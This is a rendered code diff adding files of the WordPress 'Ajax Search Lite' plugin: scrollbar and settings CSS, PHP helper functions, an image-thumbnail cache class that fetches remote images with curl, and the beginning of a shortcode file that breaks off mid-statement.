325 |
+
height:100%;
|
326 |
+
}
|
327 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
328 |
+
width:100%;
|
329 |
+
height:4px;
|
330 |
+
margin:6px auto;
|
331 |
+
-webkit-border-radius:10px;
|
332 |
+
-moz-border-radius:10px;
|
333 |
+
border-radius:10px;
|
334 |
+
}
|
335 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonLeft,
|
336 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonRight{
|
337 |
+
width:20px;
|
338 |
+
height:100%;
|
339 |
+
overflow:hidden;
|
340 |
+
margin:0 auto;
|
341 |
+
cursor:pointer;
|
342 |
+
float:left;
|
343 |
+
}
|
344 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonRight{
|
345 |
+
right:0;
|
346 |
+
bottom:auto;
|
347 |
+
margin-left:-40px;
|
348 |
+
margin-top:-16px;
|
349 |
+
float:right;
|
350 |
+
}
|
351 |
+
|
352 |
+
|
353 |
+
#ajaxsearchliteres .mCustomScrollBox .mCSB_scrollTools{
|
354 |
+
opacity:0.75;
|
355 |
+
}
|
356 |
+
#ajaxsearchliteres .mCustomScrollBox:hover .mCSB_scrollTools{
|
357 |
+
opacity:1;
|
358 |
+
}
|
359 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerRail{
|
360 |
+
background:#000; /* rgba fallback */
|
361 |
+
background:rgba(0,0,0,0.4);
|
362 |
+
filter:"alpha(opacity=40)"; -ms-filter:"alpha(opacity=40)"; /* old ie */
|
363 |
+
}
|
364 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
365 |
+
background:#fff; /* rgba fallback */
|
366 |
+
background:rgba(255, 255, 255,0.9);
|
367 |
+
filter:"alpha(opacity=90)"; -ms-filter:"alpha(opacity=90)"; /* old ie */
|
368 |
+
}
|
369 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger:hover .mCSB_dragger_bar{
|
370 |
+
background:rgba(255, 255, 255,0.95);
|
371 |
+
filter:"alpha(opacity=95)"; -ms-filter:"alpha(opacity=95)"; /* old ie */
|
372 |
+
}
|
373 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger:active .mCSB_dragger_bar,
|
374 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger.mCSB_dragger_onDrag .mCSB_dragger_bar{
|
375 |
+
background:rgba(255, 255, 255,1);
|
376 |
+
filter:"alpha(opacity=100)"; -ms-filter:"alpha(opacity=100)"; /* old ie */
|
377 |
+
}
|
378 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp,
|
379 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown,
|
380 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft,
|
381 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight{
|
382 |
+
padding: 10px 0 0 0;
|
383 |
+
background:0;
|
384 |
+
opacity:0.4;
|
385 |
+
filter:"alpha(opacity=40)"; -ms-filter:"alpha(opacity=40)"; /* old ie */
|
386 |
+
}
|
387 |
+
|
388 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown { height:0;position: relative; }
|
389 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:after { top: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute;}
|
390 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:after { border-color: rgba(136, 183, 213, 0); border-top-color: #0a3f4d; border-width: 8px; left: 50%; margin-left: -8px; }
|
391 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp { position: relative; margin:10px 0 0 0; height: 0; }
|
392 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:after { bottom: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; }
|
393 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:after { border-color: rgba(136, 183, 213, 0); border-bottom-color: #0a3f4d; border-width: 8px; left: 50%; margin-left: -8px; }
|
394 |
+
|
395 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp{
|
396 |
+
background-position:0 0;
|
397 |
+
/*
|
398 |
+
sprites locations are 0 0/-16px 0/-32px 0/-48px 0 (light) and -80px 0/-96px 0/-112px 0/-128px 0 (dark)
|
399 |
+
*/
|
400 |
+
}
|
401 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
402 |
+
background-position:0 -20px;
|
403 |
+
/*
|
404 |
+
sprites locations are 0 -20px/-16px -20px/-32px -20px/-48px -20px (light) and -80px -20px/-96px -20px/-112px -20px/-128px -20px (dark)
|
405 |
+
*/
|
406 |
+
}
|
407 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft{
|
408 |
+
background-position:0 -40px;
|
409 |
+
/*
|
410 |
+
sprites locations are 0 -40px/-20px -40px/-40px -40px/-60px -40px (light) and -80px -40px/-100px -40px/-120px -40px/-140px -40px (dark)
|
411 |
+
*/
|
412 |
+
}
|
413 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight{
|
414 |
+
background-position:0 -56px;
|
415 |
+
/*
|
416 |
+
sprites locations are 0 -56px/-20px -56px/-40px -56px/-60px -56px (light) and -80px -56px/-100px -56px/-120px -56px/-140px -56px (dark)
|
417 |
+
*/
|
418 |
+
}
|
419 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:hover,
|
420 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:hover,
|
421 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft:hover,
|
422 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight:hover{
|
423 |
+
opacity:0.75;
|
424 |
+
filter:"alpha(opacity=75)"; -ms-filter:"alpha(opacity=75)"; /* old ie */
|
425 |
+
}
|
426 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:active,
|
427 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:active,
|
428 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft:active,
|
429 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight:active{
|
430 |
+
opacity:0.9;
|
431 |
+
filter:"alpha(opacity=90)"; -ms-filter:"alpha(opacity=90)"; /* old ie */
|
432 |
+
}
|
433 |
+
|
434 |
+
#ajaxsearchliteres span.highlighted{
|
435 |
+
font-weight: bold;
|
436 |
+
color: #d9312b;
|
437 |
+
background-color: #eee;
|
438 |
+
color: #d9312b;
|
439 |
+
background-color: #eee;
|
440 |
+
}
|
441 |
+
|
442 |
+
#ajaxsearchliteres p.showmore {
|
443 |
+
text-align: center;
|
444 |
+
padding: 0;
|
445 |
+
margin: 0;
|
446 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#055e94;font-size:12px;line-height:15px;
|
447 |
+
}
|
448 |
+
|
449 |
+
#ajaxsearchliteres p.showmore a{
|
450 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#055e94;font-size:12px;line-height:15px;
|
451 |
+
}
|
452 |
+
|
453 |
+
#ajaxsearchliteres .group {
|
454 |
+
background: #DDDDDD;
|
455 |
+
background: #EFEFEF;
|
456 |
+
border-radius: 3px 3px 0 0;
|
457 |
+
border-top: 1px solid rgba(255, 255, 255, 0.7);
|
458 |
+
border-left: 1px solid rgba(255, 255, 255, 0.7);
|
459 |
+
border-right: 1px solid rgba(255, 255, 255, 0.7);
|
460 |
+
margin: 10px 0 -3px;
|
461 |
+
padding: 7px 0 7px 10px;
|
462 |
+
position: relative;
|
463 |
+
z-index: 1000;
|
464 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#055E94;font-size:11px;line-height:13px;
|
465 |
+
}
|
466 |
+
|
467 |
+
#ajaxsearchliteres .group:first-of-type {
|
468 |
+
margin: 0px 0 -3px;
|
469 |
+
}
|
470 |
+
|
471 |
+
#ajaxsearchlitesettings.searchsettings {
|
472 |
+
width: 200px;
|
473 |
+
height: auto;
|
474 |
+
background: #ffffff;
|
475 |
+
position: absolute;
|
476 |
+
display: none;
|
477 |
+
z-index: 1101;
|
478 |
+
border-radius: 0 0 3px 3px;
|
479 |
+
box-shadow: 2px 2px 3px -1px #AAAAAA;
|
480 |
+
visibility: hidden;
|
481 |
+
padding: 0 0 8px 0;
|
482 |
+
}
|
483 |
+
|
484 |
+
#ajaxsearchlitesettings.searchsettings .option {
|
485 |
+
margin: 10px;
|
486 |
+
*padding-bottom: 10px;
|
487 |
+
}
|
488 |
+
|
489 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option {
|
490 |
+
margin-bottom: 0 !important;
|
491 |
+
padding-bottom: 0 !important;
|
492 |
+
}
|
493 |
+
|
494 |
+
#ajaxsearchlitesettings.searchsettings .label {
|
495 |
+
float: left;
|
496 |
+
font-size: 14px;
|
497 |
+
line-height: 24px;
|
498 |
+
margin: 6px 10px 0 0;
|
499 |
+
width: 143px;
|
500 |
+
text-shadow: none;
|
501 |
+
padding: 0;
|
502 |
+
border: none;
|
503 |
+
background: transparent;
|
504 |
+
color: #333;
|
505 |
+
}
|
506 |
+
|
507 |
+
/* SQUARED THREE */
|
508 |
+
#ajaxsearchlitesettings.searchsettings .option input[type=checkbox] {
|
509 |
+
display:none;
|
510 |
+
}
|
511 |
+
|
512 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option input[type=checkbox] {
|
513 |
+
display:block;
|
514 |
+
}
|
515 |
+
|
516 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .label {
|
517 |
+
float:right !important;
|
518 |
+
}
|
519 |
+
|
520 |
+
#ajaxsearchlitesettings.searchsettings .option {
|
521 |
+
width: 20px;
|
522 |
+
position: relative;
|
523 |
+
float: left;
|
524 |
+
}
|
525 |
+
|
526 |
+
#ajaxsearchlitesettings.searchsettings .option label {
|
527 |
+
cursor: pointer;
|
528 |
+
position: absolute;
|
529 |
+
width: 20px;
|
530 |
+
height: 20px;
|
531 |
+
top: 0;
|
532 |
+
padding: 0;
|
533 |
+
border-radius: 4px;
|
534 |
+
-webkit-box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
535 |
+
-moz-box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
536 |
+
box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
537 |
+
background: #45484d;
|
538 |
+
background: -webkit-linear-gradient(top, #222222 0%, #45484d 100%);
|
539 |
+
background: -moz-linear-gradient(top, #222222 0%, #45484d 100%);
|
540 |
+
background: -o-linear-gradient(top, #222222 0%, #45484d 100%);
|
541 |
+
background: -ms-linear-gradient(top, #222222 0%, #45484d 100%);
|
542 |
+
background: linear-gradient(top, #222222 0%, #45484d 100%);
|
543 |
+
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#222222', endColorstr='#45484d',GradientType=0 );
|
544 |
+
}
|
545 |
+
|
546 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option label {
|
547 |
+
display:none;
|
548 |
+
}
|
549 |
+
|
550 |
+
#ajaxsearchlitesettings.searchsettings .option label:after {
|
551 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
|
552 |
+
filter: alpha(opacity=0);
|
553 |
+
opacity: 0;
|
554 |
+
content: '';
|
555 |
+
position: absolute;
|
556 |
+
width: 9px;
|
557 |
+
height: 5px;
|
558 |
+
background: transparent;
|
559 |
+
top: 4px;
|
560 |
+
left: 4px;
|
561 |
+
border: 3px solid #fcfff4;
|
562 |
+
border-top: none;
|
563 |
+
border-right: none;
|
564 |
+
|
565 |
+
-webkit-transform: rotate(-45deg);
|
566 |
+
-moz-transform: rotate(-45deg);
|
567 |
+
-o-transform: rotate(-45deg);
|
568 |
+
-ms-transform: rotate(-45deg);
|
569 |
+
transform: rotate(-45deg);
|
570 |
+
}
|
571 |
+
|
572 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option label:after {
|
573 |
+
display:none;
|
574 |
+
}
|
575 |
+
|
576 |
+
#ajaxsearchlitesettings.searchsettings .option label:hover::after {
|
577 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";
|
578 |
+
filter: alpha(opacity=30);
|
579 |
+
opacity: 0.3;
|
580 |
+
}
|
581 |
+
|
582 |
+
#ajaxsearchlitesettings.searchsettings .option input[type=checkbox]:checked + label:after {
|
583 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
|
584 |
+
filter: alpha(opacity=100);
|
585 |
+
opacity: 1;
|
586 |
+
}
|
587 |
+
|
588 |
+
#ajaxsearchlitesettings.searchsettings fieldset {
|
589 |
+
position:relative;
|
590 |
+
float:left;
|
591 |
+
}
|
592 |
+
|
593 |
+
#ajaxsearchlitesettings.searchsettings fieldset .categoryfilter {
|
594 |
+
max-height: 200px;
|
595 |
+
overflow: auto;
|
596 |
+
}
|
597 |
+
|
598 |
+
#ajaxsearchlitesettings.searchsettings fieldset {
|
599 |
+
background: transparent;
|
600 |
+
font-size: 0.9em;
|
601 |
+
margin: 5px 0 0;
|
602 |
+
padding: 0px;
|
603 |
+
}
|
604 |
+
|
605 |
+
#ajaxsearchlitesettings.searchsettings fieldset legend {
|
606 |
+
padding: 5px 0 0 10px;
|
607 |
+
margin: 0;
|
608 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#055e94;font-size:12px;line-height:15px;}
|
609 |
+
|
610 |
+
#ajaxsearchlitesettings.searchsettings fieldset .label {
|
611 |
+
width: 130px;
|
612 |
+
}
|
613 |
+
|
614 |
+
|
615 |
+
#ajaxsearchliteres .thumb .end,
|
616 |
+
#ajaxsearchliteres .thumb { background-color: #FFF; border-radius: 20px; }
|
617 |
+
#ajaxsearchliteres .scrollbar { position: relative; float: right; width: 15px; border-radius: 20px; background: #eee;}
|
618 |
+
#ajaxsearchliteres .track { background-color: #ccc; height: 100%; width:13px; position: relative; padding: 0 1px; border-radius: 20px; }
|
619 |
+
#ajaxsearchliteres .thumb { height: 20px; width: 13px; cursor: pointer; overflow: hidden; position: absolute; top: 0; }
|
620 |
+
#ajaxsearchliteres .thumb .end { overflow: hidden; height: 5px; width: 13px; }
|
621 |
+
#ajaxsearchliteres .disable{ display: none; }
|
622 |
+
#ajaxsearchliteres .viewport { position: relative; }
|
623 |
+
#ajaxsearchliteres .overview { left: 0; top: 0; }
|
624 |
+
|
functions.php
ADDED
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
|
3 |
+
if (!function_exists("in_array_r")) {
|
4 |
+
function in_array_r($needle, $haystack, $strict = true) {
|
5 |
+
foreach ($haystack as $item) {
|
6 |
+
if (($strict ? $item === $needle : $item == $needle) || (is_array($item) && in_array_r($needle, $item, $strict))) {
|
7 |
+
return true;
|
8 |
+
}
|
9 |
+
}
|
10 |
+
|
11 |
+
return false;
|
12 |
+
}
|
13 |
+
}
|
14 |
+
|
15 |
+
if (!function_exists("wpdreams_ismobile")) {
|
16 |
+
function wpdreams_ismobile() {
|
17 |
+
$is_mobile = '0';
|
18 |
+
if(preg_match('/(android|iphone|ipad|up.browser|up.link|mmp|symbian|smartphone|midp|wap|phone)/i', strtolower($_SERVER['HTTP_USER_AGENT'])))
|
19 |
+
$is_mobile=1;
|
20 |
+
if((strpos(strtolower($_SERVER['HTTP_ACCEPT']),'application/vnd.wap.xhtml+xml')>0) or ((isset($_SERVER['HTTP_X_WAP_PROFILE']) or isset($_SERVER['HTTP_PROFILE']))))
|
21 |
+
$is_mobile=1;
|
22 |
+
$mobile_ua = strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));
|
23 |
+
$mobile_agents = array('w3c ','acs-','alav','alca','amoi','andr','audi','avan','benq','bird','blac','blaz','brew','cell','cldc','cmd-','dang','doco','eric','hipt','inno','ipaq','java','jigs','kddi','keji','leno','lg-c','lg-d','lg-g','lge-','maui','maxo','midp','mits','mmef','mobi','mot-','moto','mwbp','nec-','newt','noki','oper','palm','pana','pant','phil','play','port','prox','qwap','sage','sams','sany','sch-','sec-','send','seri','sgh-','shar','sie-','siem','smal','smar','sony','sph-','symb','t-mo','teli','tim-','tosh','tsm-','upg1','upsi','vk-v','voda','wap-','wapa','wapi','wapp','wapr','webc','winw','winw','xda','xda-');
|
24 |
+
|
25 |
+
if(in_array($mobile_ua,$mobile_agents))
|
26 |
+
$is_mobile=1;
|
27 |
+
|
28 |
+
if (isset($_SERVER['ALL_HTTP'])) {
|
29 |
+
if (strpos(strtolower($_SERVER['ALL_HTTP']),'OperaMini')>0)
|
30 |
+
$is_mobile=1;
|
31 |
+
}
|
32 |
+
if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),'windows')>0)
|
33 |
+
$is_mobile=0;
|
34 |
+
return $is_mobile;
|
35 |
+
}
|
36 |
+
}
|
37 |
+
if (!function_exists("current_page_url")) {
|
38 |
+
function current_page_url() {
|
39 |
+
$pageURL = 'http';
|
40 |
+
if( isset($_SERVER["HTTPS"]) ) {
|
41 |
+
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
|
42 |
+
}
|
43 |
+
$pageURL .= "://";
|
44 |
+
if ($_SERVER["SERVER_PORT"] != "80") {
|
45 |
+
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
|
46 |
+
} else {
|
47 |
+
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
|
48 |
+
}
|
49 |
+
return $pageURL;
|
50 |
+
}
|
51 |
+
}
|
52 |
+
|
53 |
+
if (!function_exists("postval_or_getoption")) {
|
54 |
+
function postval_or_getoption($option)
|
55 |
+
{
|
56 |
+
if (isset($_POST) && isset($_POST[$option]))
|
57 |
+
return $_POST[$option];
|
58 |
+
return get_option($option);
|
59 |
+
}
|
60 |
+
}
|
61 |
+
|
62 |
+
?>
|
icon.png
ADDED
Binary file
|
img/loading-big.gif
ADDED
Binary file
|
img/loading.gif
ADDED
Binary file
|
img/loading/loading3.gif
ADDED
Binary file
|
img/magnifier.png
ADDED
Binary file
|
img/magnifiers/magn3.png
ADDED
Binary file
|
img/settings/settings1.png
ADDED
Binary file
|
includes/imagecache.class.php
ADDED
@@ -0,0 +1,175 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
/*
|
3 |
+
* Creates a cache of the image file in the given dimensions
|
4 |
+
* as a jpeg file into the specified folder.
|
5 |
+
* <code>
|
6 |
+
* //Parse the first image from text
|
7 |
+
* new wpdreamsImageCache($im, $saveas, $w, $h, 1)
|
8 |
+
* //Parse the image from url
|
9 |
+
* new wpdreamsImageCache($im, $saveas, $w, $h)
|
10 |
+
* </code>
|
11 |
+
*
|
12 |
+
* @author Ernest Marcinko <ernest.marcinko@wp-dreams.com>
|
13 |
+
* @version 1.0
|
14 |
+
* @link http://wp-dreams.com, http://codecanyon.net/user/anago/portfolio
|
15 |
+
* @copyright Copyright (c) 2012, Ernest Marcinko
|
16 |
+
*/
|
17 |
+
if (!class_exists('wpdreamsImageCache')) {
|
18 |
+
class wpdreamsImageCache {
|
19 |
+
/*
|
20 |
+
* Constructor
|
21 |
+
*
|
22 |
+
* @param string $im text containing the image or image url
|
23 |
+
* @param string $saveas path to the cache folder WITH DS on the end!
|
24 |
+
* @param int $w width of the result image
|
25 |
+
* @param int $h height of the result image
|
26 |
+
* @param int $imagenum (optional) the number of the image found in the text to be cached, if left blank, then the $im is treated as an url and NOT as TEXT!
|
27 |
+
*/
|
28 |
+
function __construct($im, $saveas, $w, $h, $imagenum=-1, $color="#ffffff") {
|
29 |
+
if ($imagenum>=0) {
|
30 |
+
$this->content = $im;
|
31 |
+
$this->imagenum = $imagenum-1;
|
32 |
+
$this->parse_content();
|
33 |
+
} else {
|
34 |
+
$this->im = $im;
|
35 |
+
}
|
36 |
+
/* Clear all possible warning, not safe, but still.. */
|
37 |
+
ob_start();
|
38 |
+
$this->resultImageName = $this->img_resizer($this->im, 100, $w, $h, $saveas, $color);
|
39 |
+
ob_end_clean();
|
40 |
+
}
|
41 |
+
|
42 |
+
function parse_content() {
|
43 |
+
$this->im = "";
|
44 |
+
if ($this->content=="") return;
|
45 |
+
$dom = new domDocument;
|
46 |
+
@$dom->loadHTML($this->content);
|
47 |
+
$dom->preserveWhiteSpace = false;
|
48 |
+
@$images = $dom->getElementsByTagName('img');
|
49 |
+
if ($images->length>0) {
|
50 |
+
if ($images->length>$this->imagenum) {
|
51 |
+
$this->im = $images->item($this->imagenum)->getAttribute('src');
|
52 |
+
} else {
|
53 |
+
$this->imagenum = 0;
|
54 |
+
$this->im = $images->item(0)->getAttribute('src');
|
55 |
+
}
|
56 |
+
}
|
57 |
+
}
|
58 |
+
|
59 |
+
function get_image() {
|
60 |
+
return $this->resultImageName;
|
61 |
+
}
|
62 |
+
|
63 |
+
function _ckdir($fn) {
|
64 |
+
if (strpos($fn,"/") !== false) {
|
65 |
+
$p=substr($fn,0,strrpos($fn,"/"));
|
66 |
+
if (!is_dir($p)) {
|
67 |
+
//_o("Mkdir: ".$p);
|
68 |
+
mkdir($p,0777,true);
|
69 |
+
}
|
70 |
+
}
|
71 |
+
}
|
72 |
+
|
73 |
+
function img_resizer($src,$quality,$w,$h,$saveas, $color) {
|
74 |
+
if (!extension_loaded('gd') || !function_exists('gd_info')) {
|
75 |
+
return "";
|
76 |
+
}
|
77 |
+
$method = $this->can_get_file();
|
78 |
+
if( $method==false) {
|
79 |
+
return "";
|
80 |
+
}
|
81 |
+
if ($src=="") return "";
|
82 |
+
$filename = md5($src.$w.$h.$this->imagenum).".jpg";
|
83 |
+
$saveas .= $filename;
|
84 |
+
if (file_exists($saveas)) return $filename;
|
85 |
+
$r = 1;
|
86 |
+
$_file = $this->url_get_contents($src, $method);
|
87 |
+
if ($_file=="") return "";
|
88 |
+
$OldImage = imagecreatefromstring($_file);
|
89 |
+
$_bgcolor = $this->hex2rgb($color);
|
90 |
+
$bgcolor = imagecolorallocate($OldImage, $_bgcolor[0],$_bgcolor[1],$_bgcolor[2]);
|
91 |
+
|
92 |
+
|
93 |
+
if ($r) {
|
94 |
+
if ($method==1) {
|
95 |
+
list($width, $height) =$this->fast_getimagesize($OldImage);
|
96 |
+
} else {
|
97 |
+
list($width,$height) =getimagesize($src);
|
98 |
+
}
|
99 |
+
|
100 |
+
if ($width<=0 || $height<=0) return "";
|
101 |
+
|
102 |
+
$_ratio=array($width/$height,$w/$h);
|
103 |
+
if ($_ratio[0] != $_ratio[1]) {
|
104 |
+
$_scale=min((float)($width/$w),(float)($height/$h));
|
105 |
+
$cropX=(float)($width-($_scale*$w));
|
106 |
+
$cropY=(float)($height-($_scale*$h));
|
107 |
+
$cropW=(float)($width-$cropX);
|
108 |
+
$cropH=(float)($height-$cropY);
|
109 |
+
$crop=ImageCreateTrueColor($cropW,$cropH);
|
110 |
+
imagefilledrectangle($crop, 0, 0, $cropW, $cropH, $bgcolor);
|
111 |
+
ImageCopy($crop,$OldImage,0,0,(int)($cropX/2),(int)($cropY/2),$cropW,$cropH);
|
112 |
+
}
|
113 |
+
|
114 |
+
$NewThumb=ImageCreateTrueColor($w,$h);
|
115 |
+
imagefilledrectangle($NewThumb, 0, 0, $w, $h, $bgcolor);
|
116 |
+
if (isset($crop)) {
|
117 |
+
ImageCopyResampled($NewThumb,$crop,0,0,0,0,$w,$h,$cropW,$cropH);
|
118 |
+
ImageDestroy($crop);
|
119 |
+
} else {
|
120 |
+
ImageCopyResampled($NewThumb,$OldImage,0,0,0,0,$w,$h,$width,$height);
|
121 |
+
}
|
122 |
+
$this->_ckdir($saveas);
|
123 |
+
ImageJpeg($NewThumb,$saveas,$quality);
|
124 |
+
ImageDestroy($NewThumb);
|
125 |
+
ImageDestroy($OldImage);
|
126 |
+
}
|
127 |
+
return $filename;
|
128 |
+
}
|
129 |
+
|
130 |
+
function can_get_file() {
|
131 |
+
if (function_exists('curl_init')){
|
132 |
+
return 1;
|
133 |
+
} else if (ini_get('allow_url_fopen')==true) {
|
134 |
+
return 2;
|
135 |
+
}
|
136 |
+
return false;
|
137 |
+
}
|
138 |
+
|
139 |
+
function url_get_contents($Url, $method) {
|
140 |
+
if ($method==2) {
|
141 |
+
return file_get_contents($Url);
|
142 |
+
} else if ($method==1) {
|
143 |
+
$ch = curl_init();
|
144 |
+
curl_setopt($ch, CURLOPT_URL, $Url);
|
145 |
+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
|
146 |
+
$output = curl_exec($ch);
|
147 |
+
curl_close($ch);
|
148 |
+
return $output;
|
149 |
+
}
|
150 |
+
}
|
151 |
+
|
152 |
+
function fast_getimagesize($im) {
|
153 |
+
$width = imagesx($im);
|
154 |
+
$height = imagesy($im);
|
155 |
+
return array($width, $height);
|
156 |
+
}
|
157 |
+
|
158 |
+
function hex2rgb($color) {
|
159 |
+
if (strlen($color)<3) return array(255,255,255);
|
160 |
+
if ($color[0] == '#')
|
161 |
+
$color = substr($color, 1);
|
162 |
+
if (strlen($color) == 6)
|
163 |
+
list($r, $g, $b) = array($color[0].$color[1],
|
164 |
+
$color[2].$color[3],
|
165 |
+
$color[4].$color[5]);
|
166 |
+
elseif (strlen($color) == 3)
|
167 |
+
list($r, $g, $b) = array($color[0].$color[0], $color[1].$color[1], $color[2].$color[2]);
|
168 |
+
else
|
169 |
+
return false;
|
170 |
+
$r = hexdec($r); $g = hexdec($g); $b = hexdec($b);
|
171 |
+
return array($r ,$g ,$b);
|
172 |
+
}
|
173 |
+
}
|
174 |
+
}
|
175 |
+
?>
|
includes/shortcodes.php
ADDED
@@ -0,0 +1,108 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
add_shortcode( 'wpdreams_ajaxsearchlite', 'add_ajaxsearchlite');
|
3 |
+
|
4 |
+
function searchlite_stylesheets() {
|
5 |
+
wp_enqueue_style('wpdreams-ajaxsearchlite', plugin_dir_url(__FILE__).'../css/'.get_option('asl_theme_select'), false);
|
6 |
+
}
|
7 |
+
add_action('wp_print_styles', 'searchlite_stylesheets');
|
8 |
+
|
9 |
+
function add_ajaxsearchlite( $atts ) {
|
10 |
+
ob_start();
|
11 |
+
$style = null;
|
12 |
+
global $wpdb;
|
13 |
+
global $wpdreams_polaroids;
|
14 |
+
$id = 1;
|
15 |
+
$file = AJAXSEARCHLITE_PATH."/css/style.css";
|
16 |
+
|
17 |
+
$settingsHidden = ((
|
18 |
+
get_option('asl_showexactmatches')!=1 &&
|
19 |
+
